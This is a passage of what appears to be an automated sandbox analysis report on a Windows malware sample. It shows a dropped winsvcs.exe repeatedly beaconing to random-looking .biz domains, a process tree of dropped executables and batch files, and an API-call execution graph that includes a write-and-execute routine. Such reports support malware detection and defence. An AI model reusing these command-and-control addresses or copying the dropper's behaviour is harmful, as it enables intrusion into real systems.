                                                                                                                                                                                                                        Set-Cookie: btst=5c4753b361b1eb941ef57a8440589e30|8.46.123.33|1721913364|1721913364|0|1|0; path=/; domain=.ssofhoseuegsgrfnj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        23192.168.2.64976434.218.204.173802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.708934069 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: eiifngjfksisiufjf.biz
                                                                                                                                                                                                                        Jul 25, 2024 15:16:10.421859026 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:10 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=4fd2a6dbe45ae70787377705520077bb|8.46.123.33|1721913370|1721913370|0|1|0; path=/; domain=.eiifngjfksisiufjf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        24192.168.2.64976654.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.862078905 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: noeuaoenriusfiruu.biz
                                                                                                                                                                                                                        Jul 25, 2024 15:16:13.643528938 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:13 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee|8.46.123.33|1721913373|1721913373|0|1|0; path=/; domain=.noeuaoenriusfiruu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        25192.168.2.64976754.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.979919910 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: fifiehsueuufidhfi.biz
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.126832962 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:21 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913381|1721913381|0|1|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.129607916 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:21 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913381|1721913381|0|1|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        26192.168.2.64976954.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.674860954 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: fuaiuebndieufeufu.com
                                                                                                                                                                                                                        Jul 25, 2024 15:16:30.553319931 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:16:30 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=347c23a7b656d6c1b8f7a9cfa806cb1a|8.46.123.33|1721913390|1721913390|0|1|0; path=/; domain=.fuaiuebndieufeufu.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        27192.168.2.64977074.119.239.234802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.376218081 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: afeifieuuufufufuf.com


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        28192.168.2.64977154.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.491183043 CEST159OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: fifiehsueuufidhfi.com
                                                                                                                                                                                                                        Jul 25, 2024 15:17:05.252253056 CEST419INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:17:05 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=0ee4b51c6cf4163101bc36868ae30c45|8.46.123.33|1721913425|1721913425|0|1|0; path=/; domain=.fifiehsueuufidhfi.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        29192.168.2.64977254.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.057415962 CEST264OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: ssofhoseuegsgrfnj.biz
                                                                                                                                                                                                                        Cookie: btst=5c4753b361b1eb941ef57a8440589e30|8.46.123.33|1721913364|1721913364|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.953108072 CEST343INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:17:09 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=5c4753b361b1eb941ef57a8440589e30|8.46.123.33|1721913429|1721913364|32|2|0; path=/; domain=.ssofhoseuegsgrfnj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        30192.168.2.64977334.218.204.173802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.055804968 CEST264OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: eiifngjfksisiufjf.biz
                                                                                                                                                                                                                        Cookie: btst=4fd2a6dbe45ae70787377705520077bb|8.46.123.33|1721913370|1721913370|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.810820103 CEST343INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:17:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=4fd2a6dbe45ae70787377705520077bb|8.46.123.33|1721913435|1721913370|32|2|0; path=/; domain=.eiifngjfksisiufjf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        31192.168.2.64977454.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.072652102 CEST264OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: noeuaoenriusfiruu.biz
                                                                                                                                                                                                                        Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee|8.46.123.33|1721913373|1721913373|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.813992977 CEST343INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:17:18 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=d9572a018c7a18b1f9b47fbe62723bee|8.46.123.33|1721913438|1721913373|32|2|0; path=/; domain=.noeuaoenriusfiruu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        32192.168.2.64977554.244.188.177802784C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.699661016 CEST264OUTGET /tldr.php?newinf=1 HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                        Host: fifiehsueuufidhfi.biz
                                                                                                                                                                                                                        Cookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913381|1721913381|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.514657974 CEST343INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Thu, 25 Jul 2024 13:17:26 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=439a750021572922cb918eec537366b2|8.46.123.33|1721913446|1721913381|32|2|0; path=/; domain=.fifiehsueuufidhfi.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:09:13:17
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_290.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:479'744 bytes
                                                                                                                                                                                                                        MD5 hash:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                        Start time:09:13:17
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Imagebase:0x610000
                                                                                                                                                                                                                        File size:15'872 bytes
                                                                                                                                                                                                                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:09:13:24
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584
                                                                                                                                                                                                                        Imagebase:0x850000
                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:09:13:27
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:479'744 bytes
                                                                                                                                                                                                                        MD5 hash:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:09:13:36
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\94000696690303050\winsvcs.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:479'744 bytes
                                                                                                                                                                                                                        MD5 hash:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:09:13:36
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                        File size:15'872 bytes
                                                                                                                                                                                                                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:09:13:55
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "
                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:09:13:55
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:09:14:04
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\94000696690303050\winsvcs.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:479'744 bytes
                                                                                                                                                                                                                        MD5 hash:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                        Start time:09:14:04
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        Imagebase:0x180000
                                                                                                                                                                                                                        File size:15'872 bytes
                                                                                                                                                                                                                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:09:14:04
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:09:14:04
                                                                                                                                                                                                                        Start date:25/07/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:8.5%
                                                                                                                                                                                                                          Signature Coverage:18.6%
                                                                                                                                                                                                                          Total number of Nodes:1274
                                                                                                                                                                                                                          Total number of Limit Nodes:23
                                                                                                                                                                                                                          execution_graph 14349 40fc5d InvalidateRect 14350 40fc71 14349->14350 13225 479000 13227 479044 GetPEB 13225->13227 13231 479077 CreateFileA 13227->13231 13229 479265 13230 47922d 13232 479246 WriteFile 13230->13232 13233 479244 13230->13233 13231->13229 13231->13230 13234 479255 FindCloseChangeNotification WinExec 13232->13234 13233->13234 13234->13229 14351 429b0c HeapCreate 14352 429b30 14351->14352 13235 40b517 13236 40b5b5 17 API calls 13235->13236 13237 40b54c 13235->13237 13240 40b812 CreateWindowExA 13236->13240 13241 40b80c 13236->13241 13237->13236 13239 40b564 GetDlgItem GetClientRect MoveWindow InvalidateRect 13237->13239 13239->13236 13242 40b840 9 API calls 13240->13242 13241->13242 13243 40b925 8 API calls 13242->13243 13245 40ba82 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13243->13245 13247 40baf1 13245->13247 13248 40bb31 13 API calls 13247->13248 13249 40bcb2 13248->13249 13250 40bcb8 CreateWindowExA 13248->13250 13251 40bce6 9 API calls 13249->13251 13250->13251 13252 40bdda 13251->13252 13253 40be06 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13252->13253 13254 40bea8 13253->13254 13255 40beac CreateWindowExA 13253->13255 13256 40beda 9 API calls 13254->13256 13255->13256 13257 40c012 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13256->13257 13260 40c06e 13257->13260 13259 40f15e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13260->13259 13261 40c0fe CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13260->13261 13266 40c0ad GetDlgItem GetClientRect MoveWindow InvalidateRect 13260->13266 13262 40c1b3 13261->13262 13263 40c1b9 CreateWindowExA 13261->13263 13264 40c1e7 9 API calls 13262->13264 13263->13264 13265 40c2cc CreateFontIndirectA SelectObject SendMessageA SetTextColor 13264->13265 13268 40c3a8 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13265->13268 13266->13261 13270 40c488 8 API calls 13268->13270 13272 40c595 13270->13272 13273 40f116 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13270->13273 13274 40c604 13 API calls 13272->13274 13278 40c5b4 GetDlgItem GetClientRect MoveWindow InvalidateRect 13272->13278 13273->13259 13275 40c790 CreateWindowExA 13274->13275 13276 40c78a 13274->13276 13277 40c7be 9 API calls 13275->13277 13276->13277 13280 40c88c 13277->13280 13278->13274 13279 40f0ce SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13279->13273 13280->13279 13281 40c91e CreateFontIndirectA SelectObject SendMessageA SetTextColor 13280->13281 13282 40c8cd GetDlgItem GetClientRect MoveWindow InvalidateRect 13280->13282 13284 40c9f2 13281->13284 13285 40f086 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13281->13285 13282->13281 13286 40ca62 9 API calls 13284->13286 13288 40ca11 GetDlgItem GetClientRect MoveWindow InvalidateRect 13284->13288 13285->13279 13289 40cbb7 13286->13289 13290 40cbbd CreateWindowExA 13286->13290 13288->13286 13291 40cbeb 9 API calls 13289->13291 13290->13291 13292 40cd23 12 API calls 13291->13292 13294 40f03e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13292->13294 13295 40ce5f 13292->13295 13294->13285 13296 40cece 8 API calls 13295->13296 13299 40ce7e GetDlgItem GetClientRect MoveWindow InvalidateRect 13295->13299 13297 40d01e CreateFontIndirectA SelectObject SendMessageA SetTextColor 13296->13297 13300 40d084 13297->13300 13301 40eff6 SendMessageW SendMessageA GetModuleHandleA 